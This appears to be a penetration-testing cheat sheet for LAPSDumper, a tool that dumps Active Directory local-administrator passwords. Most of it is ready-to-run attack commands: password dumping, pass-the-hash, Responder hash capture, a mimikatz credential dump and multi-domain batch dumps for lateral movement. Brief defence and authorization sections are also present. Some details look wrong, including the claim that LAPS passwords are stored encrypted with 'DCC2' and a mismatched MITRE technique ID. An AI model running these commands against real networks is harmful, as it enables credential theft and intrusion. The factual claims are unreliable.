Overview
LAPSDumper is a command-line tool for extracting Local Administrator Password Solution (LAPS) passwords from Active Directory environments. LAPS manages local administrator account passwords and stores them in AD attributes. LAPSDumper queries AD to retrieve these credentials, making it essential for authorized penetration testers to identify credential storage and access control weaknesses.
Installation
Linux / macOS
# Clone from GitHub
git clone https://github.com/n1nj4sec/LAPSDumper.git
cd LAPSDumper
# Install dependencies (Python 3.6+)
pip3 install -r requirements.txt
# Alternative: Install via pip
pip3 install lapsdumper
Windows
# Using pip
pip install lapsdumper
# Or clone and install locally
git clone https://github.com/n1nj4sec/LAPSDumper.git
cd LAPSDumper
pip install -r requirements.txt
Basic Usage
| Command | Description |
|---|
lapsdumper -u user -p password -d domain.local | Dump LAPS passwords with username/password auth |
lapsdumper -u user -H hash -d domain.local | Use NTLM hash instead of plaintext password |
lapsdumper -u user -p password -d domain.local -s dc01.domain.local | Specify target domain controller |
lapsdumper --ldap-server 192.168.1.10 -u admin -p pass | Target specific LDAP server by IP |
Advanced Techniques
Authentication Methods
# Kerberos authentication
lapsdumper -u user@domain.local -k -d domain.local
# LDAPS (LDAP over SSL)
lapsdumper -u user -p password -d domain.local --ldaps
# Null session (if AD allows anonymous binds)
lapsdumper -d domain.local --null-session
Filtering and Parsing Results
# Dump specific computer name
lapsdumper -u admin -p password -d domain.local -c COMPUTER_NAME
# Export to CSV
lapsdumper -u admin -p password -d domain.local -o output.csv
# Filter by OU
lapsdumper -u admin -p password -d domain.local --ou "OU=Servers,DC=domain,DC=local"
# JSON output for parsing
lapsdumper -u admin -p password -d domain.local --json
NTLM Hash Attacks
# Pass-the-hash with NTLM
lapsdumper -u DOMAIN\\user -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -d domain.local
# Extract hash with Responder first
responder -I eth0 -w
# Then use hash with LAPSDumper
lapsdumper -u domain\\user -H hash_value -d domain.local
LAPS Attribute Queries
Understanding LAPS in Active Directory
# Query specific LAPS attributes
ldapsearch -x -H ldap://dc01.domain.local -D "CN=admin,CN=Users,DC=domain,DC=local" \
-w password -b "DC=domain,DC=local" \
"(ms-Mcs-AdmPwd=*)" ms-Mcs-AdmPwd ms-Mcs-AdmPwdExpirationTime
# Search for computers with LAPS enabled
ldapsearch -x -H ldap://dc01.domain.local \
-b "DC=domain,DC=local" \
"(&(objectClass=computer)(ms-Mcs-AdmPwd=*))"
Attribute Details
| Attribute | Description | Type |
|---|
ms-Mcs-AdmPwd | Encrypted local admin password | String |
ms-Mcs-AdmPwdExpirationTime | Password expiration timestamp | Integer (Windows filetime) |
ms-Mcs-AdmPwdHistory | Historical password values | String |
Output Analysis
Interpreting Results
# Example output format
[+] Dumping LAPS passwords...
[*] Computer: WORKSTATION-01
Password: C0mpl3xP@ssw0rd!
Expiration: 2026-05-10 14:30:00
[*] Computer: WORKSTATION-02
Password: P@ssw0rd123!Secure
Expiration: 2026-05-09 09:15:00
# Process results
lapsdumper -u admin -p password -d domain.local | grep "Password:" | cut -d: -f2
Parsing CSV Output
# Convert CSV to readable format
lapsdumper -u admin -p password -d domain.local -o laps.csv
# Parse with awk
awk -F',' '{print $1, $3}' laps.csv
# Extract passwords only
cut -d',' -f3 laps.csv | tail -n +2
Troubleshooting
Common Issues
# "LDAP bind failed"
# Solution: Verify credentials and domain controller availability
lapsdumper -u domain\\user -p password -d domain.local -s dc01.domain.local -v
# "No LAPS passwords found"
# Reason: LAPS not enabled or insufficient permissions
# Check AD schema version and permissions
# "Connection timeout"
# Solution: Specify DC IP instead of hostname
lapsdumper -u user -p password -s 192.168.1.10
# Enable verbose output for debugging
lapsdumper -u admin -p password -d domain.local -vv
Permission Requirements
# Verify account has read permissions on LAPS attributes
# Use Active Directory Users and Computers or ADSIEdit
# Minimal permissions needed:
# - Read permissions on computer objects
# - Read permissions on ms-Mcs-AdmPwd attribute
# - Read permissions on ms-Mcs-AdmPwdExpirationTime attribute
LAPS Security Context
# LAPS passwords are typically 14-32 characters
# Format: Mix of uppercase, lowercase, numbers, and special characters
# Storage: Encrypted in Active Directory with DCC2 encryption
# Access: Delegated via Group Policy and AD permissions
Exploitation Scenarios
| Scenario | Attack Path |
|---|
| Low-privileged domain user | May have permissions to read LAPS on delegated OUs |
| Domain admin compromise | Can read all LAPS passwords without restrictions |
| Group Policy abuse | Misconfigured permissions on LAPS-enabled OUs |
| Delegation overflow | LAPS permissions inherited from parent OUs incorrectly |
Defense and Detection
Monitoring LAPS Access
# Enable audit logging for LAPS queries
auditpol /set /subcategory:"Directory Service Access" /success:enable /failure:enable
# Monitor event logs
Get-EventLog -LogName Security -InstanceId 4662 | Where-Object {$_.Message -like "*ms-Mcs-AdmPwd*"}
Hardening Measures
# Restrict LAPS password read permissions
# Limit to specific security groups
# Audit and monitor all queries
# Use LAPS v2 with stronger encryption
# Enforce Windows LAPS for additional protection
Combining with Mimikatz
# After dumping LAPS passwords, use them with mimikatz
mimikatz> sekurlsa::logonpasswords
# Or pass credentials to other tools
LAPSDumper -u admin -p password -d domain.local > creds.txt
# Use extracted credentials for lateral movement
Workflow with BloodHound
# Combine LAPSDumper with BloodHound for AD analysis
# 1. Run BloodHound to map AD structure
# 2. Identify computers with LAPS enabled
# 3. Use LAPSDumper to extract passwords
# 4. Map lateral movement paths
Large Environment Dumps
# Dump from large Active Directory with progress
lapsdumper -u admin -p password -d domain.local --progress
# Limit results to reduce load
lapsdumper -u admin -p password -d domain.local --max-results 1000
# Dump specific OUs only
lapsdumper -u admin -p password -d domain.local \
--ou "OU=Servers,DC=domain,DC=local" \
--ou "OU=Workstations,DC=domain,DC=local"
Batch Processing
# Process multiple domains
for domain in corp.local subsidiary.local partner.local; do
lapsdumper -u admin -p password -d $domain -o ${domain}_laps.csv
done
# Consolidate results
cat *.csv > all_laps.csv
sort -u all_laps.csv > unique_laps.csv
Legal and Ethical Considerations
Authorization Requirements
- Written authorization from system owner
- Scope limited to authorized infrastructure
- Proper documentation of all credentials obtained
- Secure handling of sensitive credentials
- Reporting and credential rotation procedures
Data Protection
# Encrypt output files
gpg --symmetric output.csv
# Secure temporary files
shred -vfz -n 10 output.csv
# Use in-memory processing when possible
lapsdumper ... | grep "Password:" | uniq
References
- LAPS Official Documentation: Microsoft LAPS
- BloodHound: LAPS enumeration module
- Active Directory Security Blog: LAPS exploitation techniques
- MITRE ATT&CK: T1110.004 Credential Access
